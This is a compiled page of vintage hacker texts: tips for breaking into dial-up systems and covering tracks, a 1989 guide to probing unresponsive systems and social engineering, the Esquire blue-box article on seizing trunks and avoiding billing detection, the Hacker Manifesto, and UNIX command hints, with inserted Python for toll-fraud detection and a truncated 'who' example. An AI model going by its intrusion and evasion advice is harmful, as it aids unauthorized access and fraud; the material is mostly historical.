* Don’t join any major hacking groups, be an individual.
* Don’t hack government computers, ESPECIALLY YOUR OWN GOVERNMENT’S! Foreign computers can sometimes be phun, but don’t say I didn’t warn you!
* Make sure that you don’t leave any evidence that you have been in a system, or any evidence of who it was.
* Use your brain.
If you follow most of these guidelines, you should be safe. The last thing you want is to end up in a one-room apartment located on the third floor of the state prison with your cellmate Bruno, the ax murderer, who’s doing life.

Getting in: The hardest thing about hacking is getting the numbers for a system. You can do this by using a scanning program. Then, once you connect to a system, you must first recognise what kind of system you have connected to. (By the way, for you real brainiacs, you have to use your terminal software to call another system.) You can usually do this by looking at the prompt you get, if you get one (check the Unresponsive Systems section). Sometimes a system will tell you as soon as you connect by saying something like “hello, welcome to Anycompany using anysystem v 1.0”. When you determine what system you have connected to, this is when you start trying your logins. You can try typing in demo as your userid and see if you can find any user names to try. If you enter a name and you are allowed in without a password you usually, but not always, have entered a name that you can’t do a whole lot with, but it can still be phun and you can probably find clues on how to get in on another name.

While you’re in: There are usually many interesting files you can read on all of these systems. You can read files about the system. You might want to try a help command. They will usually tell you a lot. Sometimes, if you’re lucky, you can manage to download the manual of the system! There is nothing like the thrill of your first hack; even if it wasn’t a very good one, it was probably still phun. You could read every text phile in the world and you still probably wouldn’t learn as much as you do during your first hack.
Have Phun!

This next segment is also excerpted from:
A Novice’s Guide to Hacking – 1989 edition
by The Mentor
Legion of Doom/Legion of Hackers

Unresponsive Systems
~~~~~~~~~~~~~~~~~~~~
Occasionally you will connect to a system that will do nothing but sit there. This is a frustrating feeling, but a methodical approach to the system will yield a response if you take your time. The following list will usually make *something* happen.
1) Change your parity, data length, and stop bits. A system that won’t respond at 8N1 may react at 7E1 or 8E2 or 7S2. If you don’t have a term program that will let you set parity to EVEN, ODD, SPACE, MARK, and NONE, with data length of 7 or 8, and 1 or 2 stop bits, go out and buy one. While having a good term program isn’t absolutely necessary, it sure is helpful.
2) Change baud rates. Again, if your term program will let you choose odd baud rates such as 600 or 1100, you will occasionally be able to penetrate some very interesting systems, as most systems that depend on a strange baud rate seem to think that this is all the security they need…
3) Send a series of <cr>’s.
4) Send a hard break followed by a <cr>.
5) Type a series of .’s (periods). The Canadian network Datapac responds to this.
6) If you’re getting garbage, hit an ‘i’. Tymnet responds to this, as does a MultiLink II.
7) Begin sending control characters, starting with ^A -> ^Z.
8) Change terminal emulations. What your vt100 emulation thinks is garbage may all of a sudden become crystal clear using ADM-5 emulation. This also relates to how good your term program is.
9) Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO, JOIN, HELP, and anything else you can think of.
10) If it’s a dialin, call the numbers around it and see if a company answers. If they do, try some social engineering.

I tried to keep this phile as short as possible to save downloading time and just tell you the very basics, like what you need to do and what you need to read. I hope this was helpful.
Plowsk¥ Phreak

Here are two philes I copied for your reading pleasure:

bluebox.txt
and
The Hackers Manifesto

bluebox.txt - The Secrets of the Little Blue Box
Originally found in Esquire Magazine

THE BLUE BOX IS INTRODUCED: ITS QUALITIES ARE REMARKED

I am in the expensively furnished living room of Al Gilbertson, the creator of the blue box. Gilbertson is holding one of his shiny black-and-silver blue boxes comfortably in the palm of his hand, pointing out the thirteen little red push buttons sticking up from the console. He is dancing his fingers over the buttons, tapping out discordant beeping electronic jingles. He is trying to explain to me how his little blue box does nothing less than place the entire telephone system of the world, satellites, cables and all, at the service of the blue-box operator, free of charge.

“That’s what it does. Essentially it gives you the power of a super operator. You seize a tandem with this top button,” he presses the top button with his index finger and the blue box emits a high-pitched cheep, “and like that,” the box cheeps again, “you control the phone company’s long distance switching systems from your cute little Princess phone or any old pay phone. And you’ve got anonymity. An operator has to operate from a definite location. The phone company knows where she is and what she’s doing. But with your blue box, once you hop onto a trunk, say from a Holiday Inn 800 number, they don’t know where you are, or where you’re coming from, they don’t know how you slipped into their lines and popped up in that 800 number. They don’t even know anything illegal is going on. And you can obscure your origins through as many levels as you like. You can call next door by way of White Plains, then over to Liverpool by cable and then back here by satellite. You can call yourself from one pay phone all the way around the world to a pay phone next to you. And you get your dime back too.”

“And they can’t trace the calls? They can’t charge you?”

“Not if you do it the right way. But you’ll find that the free-call thing isn’t really as exciting at first as the feeling of power you get from having one of these babies in your hand. I’ve watched people when they first get hold of one of these things and start using it, and discover they can make connections, set up crisscross and zigzag switching patterns back and forth across the world. They hardly talk to the people they finally reach. They say hello and start thinking of what kind of call to make next. They go a little crazy.” He looks down at the neat little package in his palm. His fingers are still dancing, tapping out beeper patterns.

“I think it’s something to do with how small my models are. There are lots of blue boxes around, but mine are the smallest and most sophisticated electronically. I wish I could show you the prototype we made for our big syndicate order.”

He sighs. “We had this order for a thousand blue boxes from a syndicate front man in Las Vegas. They use them to place bets coast to coast, keep lines open for hours, all of which can get expensive if you have to pay. The deal was a thousand blue boxes for $300 apiece. Before then we retailed them for $1500 apiece, but $300,000 in one lump was hard to turn down. We had a manufacturing deal worked out in the Philippines. Everything was ready to go. Anyway, the model I had ready for limited mass production was small enough to fit inside a flip-top Marlboro box. It had flush-touch panels for a keyboard, rather than these unsightly buttons sticking out. Looked just like a tiny portable radio. In fact I had designed it with a tiny transistor receiver to get one AM channel, so in case the law became suspicious the owner could switch on the radio part, start snapping his fingers and no one could tell anything illegal was going on. I thought of everything for this model. I had it lined with a band of thermite which could be ignited by radio signal from a tiny button transmitter on your belt, so it could be burned to ashes instantly in case of a bust. It was beautiful. A beautiful little machine. You should have seen the face on these syndicate guys when they came back after trying it out. They’d hold it in their palm like they never wanted to let it go, and they’d say, ‘I can’t believe it.’ You probably won’t believe it until you try it.”

THE BLUE BOX IS TESTED: CERTAIN CONNECTIONS ARE MADE

About eleven o’clock two nights later Fraser Lucey has a blue box in the palm of his left hand and a phone in the palm of his right. He is standing inside a phone booth next to an isolated shut-down motel. I am standing outside the phone booth.

Fraser likes to show off his blue box for people. Until a few weeks ago when Pacific Telephone made a few arrests in his city, Fraser Lucey liked to bring his blue box to parties. It never failed: a few cheeps from his device and Fraser became the center of attention at the very hippest of gatherings, playing phone tricks and doing request numbers for hours. He began to take orders for his manufacturer in Mexico. He became a dealer.

Fraser is cautious now about where he shows off his blue box. But he never gets tired of playing with it. “It’s like the first time every time,” he tells me.

Fraser puts a dime in the slot. He listens for a tone and holds the receiver up to my ear. I hear the tone.

Fraser begins describing, with a certain practiced air, what he does while he does it.

“I’m dialing an 800 number now. Any 800 number will do. It’s toll free. Tonight I think I’ll use the Ryder Rent A Van number. Listen, it’s ringing. Here, you hear it? Now watch.”

He places the blue box over the mouthpiece of the phone so that the one silver and twelve black push buttons are facing up toward me. He presses the silver button, the one at the top, and I hear that high-pitched beep. “That’s 2600 cycles per second to be exact,” says Lucey. “Now, quick, listen.”

He shoves the ear piece at me. The ringing has vanished. The line gives a slight hiccough, there is a sharp buzz, and then nothing but soft white noise.

“We’re home free now,” Lucey tells me, taking back the phone and applying the blue box to its mouthpiece once again. “We’re up on a tandem, into a long-lines trunk. Once you’re up on a tandem, you can send yourself anywhere you want to go.” He decides to check out London first. He chooses a certain pay phone located in Waterloo station. This particular pay phone is popular with the phone phreaks because there are usually people walking by at all hours who will pick it up and talk for a while.

He presses the lower left-hand corner button which is marked “KP” on the face of the box.

“That’s Key Pulse. It tells the tandem we’re ready to give it instructions. First I’ll punch out KP 182 START, which will slide us into the overseas sender in White Plains.” I hear a neat clunk-cheep. “I think we’ll head over to England by satellite. Cable is actually faster and the connection is somewhat better, but I like going by satellite. So I just punch out KP Zero 44. The Zero is supposed to guarantee a satellite connection and 44 is the country code for England. Okay… we’re there. In Liverpool actually. Now all I have to do is punch out the London area code which is 1, and dial up the pay phone. Here, listen, I’ve got a ring now.”

I hear the soft quick purr-purr of a London ring. Then someone picks up the phone. “Hello,” says the London voice.

“Hello, who’s this?” Fraser asks.

“Hello. There’s actually nobody here. I just picked this up while I was passing by. This is a public phone. There’s no one here to answer actually.”

“Hello. Don’t hang up. I’m calling from the United States.”

“Oh. What is the purpose of the call? This is a public phone you know.”

“Oh. You know. To check out, uh, to find out what’s going on in London. How is it there?”

“It’s five o’clock in the morning. It’s raining now.”

“Oh. Who are you?”

The London passerby turns out to be an R.A.F. enlistee on his way back to the base in Lincolnshire, with a terrible hangover after a thirty-six hour pass.

He and Fraser talk about the rain. They agree that it’s nicer when it’s not raining. They say good-bye and Fraser hangs up. His dime returns with a nice clink.

“Isn’t that far out,” he says, grinning at me. “London. Like that.”

Fraser squeezes the little blue box affectionately in his palm. “I told ya this thing is for real. Listen, if you don’t mind I’m gonna try this girl I know in Paris. I usually give her a call around this time. It freaks her out. This time I’ll use the Penske 800 number and we’ll go by overseas cable 133; 33 is the country code for France, the 1 sends you by cable. Okay, here we go. Oh damn. Busy. Who could she be talking to at this time?”

A state police car cruises slowly by the motel. The car does not stop, but Fraser gets nervous. We hop back into his car and drive ten miles in the opposite direction until we reach a Texaco station locked up for the night. We pull up to a phone booth by the tire pump. Fraser dashes inside and tries the Paris number. It is busy again.

“I don’t understand who she could be talking to. The circuits may be busy. It’s too bad I haven’t learned how to tap into lines overseas with this thing yet.”

Fraser begins to phreak around, as the phone phreaks say. He dials a leading nationwide charge card’s 800 number and punches out the tones that bring him the Time recording in Sydney, Australia. He beeps up the Weather recording in Rome, in Italian of course. He calls a friend in Chicago and talks about a certain over the counter stock they are into heavily. He finds the Paris number busy again. He calls up a dealer of another sort and talks in code. He calls up Joe Engressia, the original blind phone phreak genius, and pays his respects. There are other calls. Finally Fraser gets through to his young lady in Paris. They both agree the circuits must have been busy, and criticize the Paris telephone system. At two-thirty in the morning Fraser hangs up, pockets his dime, and drives off, steering with one hand, holding what he calls his “lovely little blue box” in the other.

YOU CAN CALL LONG DISTANCE FOR LESS THAN YOU THINK

“You see, a few years ago the phone company made one big mistake,” Gilbertson explains two days later in his apartment. “They were careless enough to let some technical journal publish the actual frequencies used to create all their multi-frequency tones. Just a theoretical article some Bell Telephone Laboratories engineer was doing about switching theory, and he listed the tones in passing. At MIT I had been fooling around with phones for several years before I came across a copy of the journal in the engineering library. I ran back to the lab and it took maybe twelve hours from the time I saw that article to put together the first working blue box. It was bigger and clumsier than this little baby, but it worked.

“It’s all there on public record in that technical journal written mainly by Bell Lab people for other telephone engineers. Or at least it was public.”

“Just try and get a copy of that issue at some engineering school library now. Bell has had them all red-tagged and withdrawn from circulation,” Gilbertson tells me.

“But it’s too late now. It’s all public now. And once they became public the technology needed to create your own beeper device is within the range of any twelve-year-old kid, any twelve-year-old blind kid as a matter of fact. And he can do it in less than the twelve hours it took us. Blind kids do it all the time. They can’t build anything as precise and compact as my beeper box, but theirs can do anything mine can do.”

“How?”

“Okay. About twenty years ago AT&T made a multi-million dollar decision to operate its entire long-distance switching system on twelve electronically generated combinations of six master tones. Those are the tones you sometimes hear in the background after you’ve dialed a long distance number. They decided to use some very simple tones. The tone for each number is just two fixed single-frequency tones played simultaneously to create a certain beat frequency. Like 1300 cycles per second and 900 cycles per second played together give you the tone for digit 5. Now, what some of these phone phreaks have done is get themselves access to an electric organ. Any cheap family home entertainment organ. Since the frequencies are public knowledge now, one blind phone phreak has even had them recorded in one of those talking books for the blind, they just have to find the musical notes on the organ which correspond to the phone tones. Then they tape them. For instance, to get Ma Bell’s tone for the number, you press down organ keys F3 and A3 (900 and 700 cycles per second) at the same time. To produce the tone for 2 it’s F3 and C6 (1100 and 700 c.p.s). The phone phreaks circulate the whole list of notes so there’s no trial and error anymore.”

He shows me a list of the rest of the phone numbers and the two electric organ keys that produce them.

“Actually, you have to record these notes at 3 3/4 inches per second tape speed and double it to 7 1/2 inches per second when you play them back, to get the proper tones,” he adds.

“So once you have all the tones recorded, how do you plug them into the phone system?”

“Well, they take their organ and their cassette recorder, and start banging out entire phone numbers in tones on the organ, including country codes, routing instructions, ‘KP’ and ‘Start’ tones. Or, if they don’t have an organ, someone in the phone-phreak network sends them a cassette with all the tones recorded with a voice saying ‘Number one,’ then you have the tone, ‘Number two,’ then the tone and so on. So with two cassette recorders they can put together a series of phone numbers by switching back and forth from number to number. Any idiot in the country with a cheap cassette recorder can make all the free calls he wants.”

“You mean you just hold the cassette recorder up to the mouthpiece and switch in a series of beeps you’ve recorded? The phone thinks that anything that makes these tones must be its own equipment?”

“Right. As long as you get the frequency within thirty cycles per second of the phone company’s tones, the phone equipment thinks it hears its own voice talking to it. The original granddaddy phone phreak was this blind kid with perfect pitch, Joe Engressia, who used to whistle into the phone. An operator could tell the difference between his whistle and the phone company’s electronic tone generator, but the phone company’s switching circuit can’t tell them apart.

“The bigger the phone company gets and the further away from human operators it gets, the more vulnerable it becomes to all sorts of phone phreaking.”

A GUIDE FOR THE PERPLEXED

“But wait a minute,” I stop Gilbertson. “If everything you do sounds like phone-company equipment, why doesn’t the phone company charge you for the call the way it charges its own equipment?”

“Okay. That’s where the 2600-cycle tone comes in. I better start from the beginning.”

The beginning he describes for me is a vision of the phone system of the continent as thousands of webs, of long-line trunks radiating from each of the hundreds of toll switching offices to the other toll switching offices. Each toll switching office is a hive compacted of thousands of long-distance tandems constantly whistling and beeping to tandems in far-off toll switching offices.

The tandem is the key to the whole system. Each tandem is a line with some relays with the capability of signaling any other tandem in any other toll switching office on the continent, either directly one-to-one or by programming a roundabout route through several other tandems if all the direct routes are busy. For instance, if you want to call from New York to Los Angeles and traffic is heavy on all direct trunks between the two cities, your tandem in New York is programmed to try the next best route, which may send you down to a tandem in New Orleans, then up to San Francisco, or down to a New Orleans tandem, back to an Atlanta tandem, over to an Albuquerque tandem and finally up to Los Angeles.

When a tandem is not being used, when it’s sitting there waiting for someone to make a long-distance call, it whistles. One side of the tandem, the side “facing” our home phone, whistles at 2600 cycles per second toward all the home phones serviced by the exchange, telling them it is at their service, should they be interested in making a long-distance call. The other side of the tandem is whistling 2600 c.p.s. into one or more long distance trunk lines, telling the rest of the phone system that it is neither sending nor receiving a call through the trunk at the moment, that it has no use for that trunk at the moment.

When you dial a long-distance number the first thing that happens is that you are hooked into a tandem. A register comes up to the side of the tandem facing away from you and presents that side with the number you dialed. This sending side of the tandem stops whistling 2600 into its trunk line. When a tandem stops the 2600 tone it has been sending through a trunk, the trunk is said to be “seized,” and is now ready to carry the number you have dialed, converted into multi-frequency beep tones, to a tandem in the area code and central office you want.

Now when a blue-box operator wants to make a call from New Orleans to New York he starts by dialing the 800 number of a company which might happen to have its headquarters in Los Angeles. The sending side of this New Orleans tandem stops sending 2600 out over the trunk to the central office in Los Angeles, thereby seizing the trunk. Your New Orleans tandem begins sending beep tones to a tandem it has discovered idly whistling 2600 cycles in Los Angeles. The receiving end of that L.A. tandem is seized, stops whistling 2600, listens to the beep tones which tell it which L.A. phone to ring, and starts ringing the 800 number. Meanwhile, a mark made in the New Orleans office accounting tape indicates that a call from your New Orleans phone to the 800 number in L.A. has been initiated and gives the call a code number. Everything is routine so far.

But then the phone phreak presses his blue box to the mouthpiece and pushes the 2600-cycle button, sending 2600 out from the New Orleans tandem notices the 2600 cycles are coming over the line again and assumes that New Orleans has hung up because the trunk is whistling as if idle. But,

Thus the blue-box operator in New Orleans now is in touch with a tandem in L.A. which is waiting like an obedient genie to be told what to do next. The blue-box owner then beeps out the ten digits of the New York number which tells the L.A. tandem to relay a call to New York City. Which it promptly does. As soon as your party picks up the phone in New York, the side of the New Orleans tandem facing you stops sending 2600 to you and starts carrying his voice to you by way of the L.A. tandem. A notation is made on the accounting tape that the connection has been made on the 800 call which had been initiated and noted earlier. When you stop talking to New York a notation is made that the 800 call has ended.

At three the next morning, when the phone company’s accounting computer starts reading back over the master accounting tape for the past day, it records that a call of a certain length of time was made from your New Orleans home to an L.A. 800 number and, of course, the accounting computer has been trained to ignore these toll free 800 calls when compiling your monthly bill.

“All they can prove is that you made an 800 call,” Gilbertson the inventor concludes. “Of course, if you’re foolish enough to talk for two hours on an 800 call, and they’ve installed one of their special anti-fraud computer programs to watch out for such things, they may spot you and ask you why you took two hours talking to Army Recruiting’s 800 number when you’re 4-F. But if you do it from a pay phone, they may discover something peculiar the next day, if they’ve got a blue-box hunting program in their computer, but you’ll be a long time gone from the pay phone by then. Using a pay phone is almost guaranteed safe.”

“What about the recent series of blue-box arrests all across the country, New York, Cleveland, and so on?” I asked. “How were they caught so easily?”

“From what I can tell, they made one big mistake. They were seizing trunks using an area code plus 555-1212 instead of an 800 number. When you send multi-frequency beep tones off 555 you get a charge for it on your tape and the accounting computer knows there’s something wrong when it tries to bill you for a two-hour call to Akron, Ohio, information, and it drops a trouble card which goes right into the hands of the security agent if they’re looking for blue-box users.

“Whoever sold those guys their blue boxes didn’t tell them how to use them properly, which is fairly irresponsible. And they were fairly stupid to use them at home all the time. But what those arrests really mean is that an awful lot of blue boxes are flooding into the country and that people are finding them so easy to make that they know how to make them before they know how to use them. Ma Bell is in trouble.”

“And if a blue-box operator or a cassette-recorder phone phreak sticks to pay phones and 800 numbers, the phone company can’t stop them?”

“Not unless they change their entire nationwide long-lines technology, which will take them a few billion dollars and twenty years. Right now they can’t do a thing. They’re screwed.”

CAPTAIN CRUNCH DEMONSTRATES HIS FAMOUS UNIT

There is an underground telephone network in this country. Gilbertson discovered it the very day news of his activities hit the papers. That evening his phone began ringing. Phone phreaks from Seattle, from Florida, from New York, from San Jose, and from Los Angeles began calling him and telling him about the phone-phreak network. He’d get a call from a phone phreak who’d say nothing but, “Hang up and call this number.”

When he dialed the number he’d find himself tied into a conference of a dozen phone phreaks arranged through a quirky switching station in British Columbia. They identified themselves as phone phreaks, they demonstrated their homemade blue boxes which they called “MFers” (for multi-frequency, among other things) for him, they talked shop about phone phreak devices. They let him in on their secrets on the theory that if the phone company was after him he must be trustworthy. And, Gilbertson recalls, they stunned him with their technical sophistication.

I ask him how to get in touch with the phone-phreak network. He digs around through a file of old schematics and comes up with about a dozen numbers in three widely separated area codes.

“Those are the centers,” he tells me. Alongside some of the numbers he writes in first names or nicknames: names like Captain Crunch, Dr. No, Frank Carlson (also a code word for free call), Marty Freeman (code word for MF device), Peter the Perpendicular Pimple, Alefnull, and The Cheshire Cat. He makes checks alongside the names of those among these top twelve who are blind. There are five checks.

I ask him who this Captain Crunch person is.

“Oh, The Captain. He’s probably the most legendary phone phreak. He calls himself Captain Crunch after the notorious Cap’n Crunch 2600 whistle. Several years ago the makers of Cap’n Crunch breakfast cereal offered a toy whistle prize in every box as a treat for the Cap’n Crunch set. Somehow a phone phreak discovered that the toy whistle just happened to produce a perfect 2600-cycle tone. When the man who calls himself Captain Crunch was transferred overseas to England with his Air Force unit, he would receive scores of calls from his friends and ‘mute’ them, that is, make them free of charge to them, by blowing his Cap’n Crunch whistle into his end.”

“Captain Crunch is one of the older phone phreaks,” Gilbertson tells me. “He’s an engineer who once got in a little trouble for fooling around with the phone, but he can’t stop. Well, this guy drives across country in a Volkswagen van with an entire switchboard and a computerized super-sophisticated MFer in the back. He’ll pull up to a phone booth on a lonely highway somewhere, snake a cable out of his bus, hook it onto the phone and sit for hours, days sometimes, sending calls zipping back and forth across the country, all over the world.”

Back at my house, I dialed the number he gave me for “Captain Crunch” and asked for Gary Thomas, his real name, or at least the name he uses when he’s not dashing into a phone booth beeping out MF tones faster than a speeding bullet, and zipping phantomlike through the phone company’s long-distance lines.

When Gary answered the phone and I told him I was preparing a text file about phone phreaks, he became very indignant.

“I don’t do that. I don’t do that anymore at all. And if I do it, I do it for one reason and one reason only. I’m learning about a system. The phone company is a system. A computer is a system. Do you understand? If I do what I do, it is only to explore a System. Computers. Systems. That’s my bag. The phone company is nothing but a computer.”

A tone of tightly restrained excitement enters the Captain’s voice when he starts talking about Systems. He begins to pronounce each syllable with the hushed deliberation of an obscene caller.

“Ma Bell is a system I want to explore. It’s a beautiful system, you know, but Ma Bell screwed up. It’s terrible because Ma Bell is such a beautiful system but she screwed up. I learned how she screwed up from a couple of blind kids who wanted me to build a device. A certain device. They said it could make free calls. But when these blind kids told me I could make calls into a computer, my eyes lit up. I wanted to learn about computers. I wanted to learn about Ma Bell’s computers. So I built the little device. Only I built it wrong and Ma Bell found out. Ma Bell can detect things like that. Ma Bell knows. So I’m strictly out of it now. I don’t do it. Except for learning purposes.” He pauses. “So you want to write a text file. Are you paying for this call? Hang up and call this number.”

He gives me a number in an area code a thousand miles north of his own. I dial the number.

“Hello again. This is Captain Crunch. You are speaking to me on a toll-free loop in Portland, Oregon. Do you know what a toll-free loop is? I’ll tell you.”

He explains to me that almost every exchange in the country has open test numbers which allow other exchanges to test their connections with it. Most of these numbers occur in consecutive pairs, such as 302 956-0041 and 956-0042. Well, certain phone phreaks discovered that if two people from anywhere in the country dial those two consecutive numbers they can talk together just as if one had called the other’s number, with no charge to either of them, of course.

“Your voice is looping around in a 4A switching machine up there in Canada, zipping back down to me,” the Captain tells me. “My voice is looping around up there and back down to you. And it can’t ever cost anyone money. The phone phreaks and I have compiled a list of many many of these numbers. You would be surprised if you saw the list. I could show it to you. But I won’t. I’m out of that now. I’m not out to screw Ma Bell. I know better. If I do anything it’s for the pure knowledge of the System. You can learn to do fantastic things. Have you ever heard eight tandems stacked up? Do you know the sound of tandems stacking and unstacking? Give me your phone number. Hang up now and wait a minute.”

Slightly less than a minute later the phone rang and the Captain was on the line, his voice sounding far more excited, almost aroused.

“I wanted to show you what it’s like to stack up tandems.” (Whenever the Captain says “stack up” he sounds like he is smacking his lips.)

“How do you like the connection you’re on now?” the Captain asks me. “It’s a raw tandem. A raw tandem. I’m going to show you what it’s like to stack up. Blow off. Land in a faraway place. To stack that tandem up, whip back and forth across the country a few times, then shoot on up to Moscow.”

“Listen,” Captain Crunch continues. “Listen. I’ve got a line tie on my switchboard here, and I’m gonna let you hear me stack and unstack tandems. Listen to this. I’m gonna blow your mind.”

First I hear a super rapid-fire pulsing of flutelike phone tones, then a pause, then another popping burst of tones, then another, then another. Each burst is followed by a beep-kachink sound.

“We have now stacked up four tandems,” said Captain Crunch, sounding somewhat remote. “That’s four tandems stacked up. Do you know what that means? That means I’m whipping back and forth, back and forth twice, across the country, before coming to you. I’ve been known to stack up twenty tandems at a time. Now, just like I said, I’m going to shoot up to Moscow.”

There is a new longer series of beeper pulses over the line, a brief silence, then a ring.

“Hello,” answers a far-off voice.

“Hello, is this the American Embassy Moscow?”

“Yes, sir, who is calling?” says the voice.

“Yes, this is test board here in New York. We’re calling to check out the circuits, see what kind of lines you’ve got. Everything okay there in Moscow?”

“Okay?”

“Well, yes, how are things there?”

“Oh. Well everything’s okay, I guess.”

“Okay. Thank you.” They hang up, leaving a confused series of beep-kachink sounds hanging in mid-ether in the wake of the call before dissolving away.
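Gilbertson’s account names the two checks that actually caught blue-box users in the accounting run: an anti-fraud program that notices improbably long calls to toll-free 800 numbers, and the billing pass that drops a trouble card when an area-code-plus-555-1212 call turns out to be hours long and billable. The Python below is an added illustration of such a pass, written for this page and not taken from the article or any carrier; the record layout, the duration thresholds, the line identifiers and the sample tape are all constructed.

```python
"""
Toll-fraud triage over a day's (constructed) call-accounting records.

Two signals, both described in the Esquire piece:
  * a toll-free (800) call that runs far longer than anyone talks to a
    recruiting office or a rental desk, which is the only signal available
    because toll-free calls never produce a charge to look wrong; and
  * a directory-assistance call (area code + 555-1212) with a long,
    billable duration, which the billing computer cannot rate sensibly
    and so "drops a trouble card" on.
Everything here (record layout, thresholds, sample lines) is an assumption
made for the example, not a figure or format from the article.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class CallRecord:
    """One entry from the constructed master accounting tape."""
    origin: str       # originating line as the office recorded it (constructed id)
    dialed: str       # dialed digits, area code first, no punctuation
    seconds: int      # connected duration
    coin_phone: bool  # True if the originating line is a pay phone


@dataclass(frozen=True)
class TroubleCard:
    """What the accounting run hands to the security agent."""
    origin: str
    dialed: str
    reason: str
    traceable: bool   # a coin-phone card names a booth, not a subscriber


# Thresholds are assumptions for this example, not figures from the article.
LONG_TOLL_FREE_SECONDS = 30 * 60   # the article's example is a two-hour 800 call
LONG_INFO_SECONDS = 5 * 60         # directory assistance takes seconds, not hours
REPEAT_THRESHOLD = 3               # several long 800 calls from one home line in a day


def is_toll_free(dialed: str) -> bool:
    return len(dialed) == 10 and dialed.startswith("800")


def is_directory_assistance(dialed: str) -> bool:
    # area code plus 555-1212: the pattern that got the arrested operators billed
    return len(dialed) == 10 and dialed[3:] == "5551212"


def triage(tape):
    """Return the trouble cards the accounting run would drop for one day's tape."""
    cards = []
    long_toll_free_per_line = defaultdict(int)
    for rec in tape:
        if is_directory_assistance(rec.dialed) and rec.seconds > LONG_INFO_SECONDS:
            # Billable and hours long: the billing pass cannot rate this sensibly.
            cards.append(TroubleCard(rec.origin, rec.dialed,
                                     "long directory-assistance call",
                                     traceable=not rec.coin_phone))
        elif is_toll_free(rec.dialed) and rec.seconds > LONG_TOLL_FREE_SECONDS:
            # Never billed, so duration is the only thing that can look wrong.
            cards.append(TroubleCard(rec.origin, rec.dialed,
                                     "long toll-free call",
                                     traceable=not rec.coin_phone))
            if not rec.coin_phone:
                long_toll_free_per_line[rec.origin] += 1
    # A home line that does this repeatedly gets a card of its own.
    for origin, count in sorted(long_toll_free_per_line.items()):
        if count >= REPEAT_THRESHOLD:
            cards.append(TroubleCard(origin, "*",
                                     f"{count} long toll-free calls in one day",
                                     traceable=True))
    return cards


def summarize(cards):
    """Count cards per reason so a reviewer sees the shape of the day at a glance."""
    counts = defaultdict(int)
    for card in cards:
        counts[card.reason] += 1
    return dict(counts)


# Constructed sample tape; the line ids are placeholders, not real numbers.
SAMPLE_TAPE = [
    CallRecord("504-0101", "8002345678", 7200, False),  # two hours on an 800 number
    CallRecord("504-0101", "8002345678", 5400, False),
    CallRecord("504-0101", "8009876543", 4000, False),
    CallRecord("504-0199", "2165551212", 7200, False),  # two hours to Akron information
    CallRecord("504-0150", "8001112222", 45, False),    # ordinary toll-free call
    CallRecord("504-0188", "2125551212", 40, False),    # ordinary information call
    CallRecord("504-0900", "8002345678", 9000, True),   # coin phone: card, but no subscriber
]

if __name__ == "__main__":
    for card in triage(SAMPLE_TAPE):
        note = "" if card.traceable else " (coin phone, not traceable to a subscriber)"
        print(f"{card.origin} -> {card.dialed}: {card.reason}{note}")
```

The coin-phone record still produces a card, which is exactly the gap Gilbertson points at: the run sees something peculiar the next day but has only a booth to show for it.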
Hackers Manifesto -

Another one got caught today, it’s all over the papers. “Teenager Arrested in Computer Crime Scandal”, “Hacker Arrested after Bank Tampering”…

Damn kids. They’re all alike.

But did you, in your three-piece psychology and 1950’s technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?

I am a hacker, enter my world…

Mine is a world that begins with school… I’m smarter than most of the other kids, this crap they teach us bores me…

Damn underachiever. They’re all alike.

I’m in junior high or high school. I’ve listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. “No, Ms. Smith, I didn’t show my work. I did it in my head…”

Damn kid. Probably copied it. They’re all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it’s because I screwed it up. Not because it doesn’t like me…
Or feels threatened by me…
Or thinks I’m a smart ass…
Or doesn’t like teaching and shouldn’t be here…

Damn kid. All he does is play games. They’re all alike.

And then it happened… a door opened to a world… rushing through the phone line like heroin through an addict’s veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought… a board is found.

“This is it… this is where I belong…”

I know everyone here… even if I’ve never met them, never talked to them, may never hear from them again… I know you all…

Damn kid. Tying up the phone line again. They’re all alike…

You bet your ass we’re all alike… we’ve been spoon-fed baby food at school when we hungered for steak… the bits of meat that you did let slip through were pre-chewed and tasteless. We’ve been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

This is our world now… the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn’t run by profiteering gluttons, and you call us criminals. We explore… and you call us criminals. We seek after knowledge… and you call us criminals. We exist without skin color, without nationality, without religious bias… and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it’s for our own good, yet we’re the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can’t stop us all… after all, we’re all alike.

A List Of Some Of The Most Useful UNIX Hacking Commands, and Some Hints On Their Usage


It is fun and often useful to create a file that is owned
by someone else.  On most systems with slack security (i.e. 99% of
all UNIX systems), this is quite easily done.  The chown command
will change any of your files to make someone else the owner.
Format is as follows:

chown ownername filelist

Where ownername is the new owner, and filelist is the list of
files to change.  You must own the file which you are going to
change, unless you are a superuser….then you can change ANYTHING!
chgrp is a similar command which will change the group
ownership on a file.  If you are going to do both a chown and a
chgrp on a file, then make sure you do the chgrp first!  Once the
file is owned by someone else, you can’t change anything about it!

—————————————————————

Sometimes just seeing who is on the system is a challenge in
itself.  The best way is to write your own version of who in C,
but if you can’t do that then this may be of some help to you:

who   followed by one or more of the following flags:

-b Displays the time the system was last booted.
-H Precedes output with a header.
-l Lists lines waiting for users to log on.
-q Displays the number of users logged on.
-t Displays the time the system clock was last changed.
-T Displays the state field (a + indicates it is
possible to send to the terminal, a - means you cannot).
-u Gives a complete listing of those logged on.

**who -HTu is about the best choice for the average user**

##by the way, the list of users logged on is kept in the file
/etc/utmp.  If you want to write your own personalised version of
who in C, you now know where to look!###
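As an added example (not from the original text), here is a minimal who written in Python instead of C, reading the utmp record format directly. It assumes the 384-byte glibc record layout used on 64-bit Linux, and that the file named /etc/utmp above lives at /var/run/utmp on current systems; the two records it parses by default are constructed inline.

```python
"""Added example: a minimal 'who' that parses utmp records itself.

Assumes the glibc layout of struct utmp on 64-bit Linux (384 bytes per
record).  The historical path /etc/utmp named in the text is
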